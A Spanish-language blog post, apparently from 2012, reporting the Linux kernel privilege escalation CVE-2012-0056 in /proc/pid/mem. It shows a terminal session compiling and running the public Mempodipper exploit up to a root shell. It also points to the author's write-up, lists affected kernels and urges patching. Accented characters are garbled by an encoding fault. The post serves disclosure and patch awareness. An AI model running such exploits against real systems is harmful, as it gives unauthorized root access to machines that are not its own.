Escalada de privilegios con /proc/pid/mem-write

Un experto en informatica ha encontrado como conseguir privilegios de superusuario desde una cuenta de usuario comun, claro ya para esto hay un parche por fortuna.

CVE-2012-0056 $ ls
build-and-run-exploit.sh  build-and-run-shellcode.sh  mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2#

La vulnerabilidad reside en el acceso en /proc/pid/mem, al parecer no est谩 muy bien gestionado y que a trav茅s de cierto tipo de accesos podamos conseguir privilegios de superusuario.

La explicaci贸n completa est谩 en聽http://blog.zx2c4.com/749聽(en ingles)聽en donde este experto ha explicado c贸mo funciona el exploit para la聽vulnerabilidad con n煤mero CVE-2012-0056, adem谩s de ofrecer un programa que la explota llamada Mempodipper, disponible en el聽repositorio git聽de ese usuario.

Todos los kernels Linux 2.6.39 y superiores (incluyendo la serie 3.x) son vulnerables al exploit, aunque Linus ya聽public贸 una correcci贸n al problema聽hace unos d铆as. Es interesante ver como se hace el ataque, si tienes sistemas que puedan estar afectados por el problema, es recomendable actualizar cuanto antes聽para evitar problemas mayores, ya que varias distros (Ubuntu y RHEL, entre otras)聽ya han preparado聽los paquetes necesarios para solucionar el tema.

Fuente: Anime Linux Style

Share

This entry was posted in bugs, linux, seguridad, updates. Bookmark the permalink.

Deja una respuesta

Tu direcci贸n de correo electr贸nico no ser谩 publicada. Los campos obligatorios est谩n marcados con *

Este sitio usa Akismet para reducir el spam. Aprende c贸mo se procesan los datos de tus comentarios.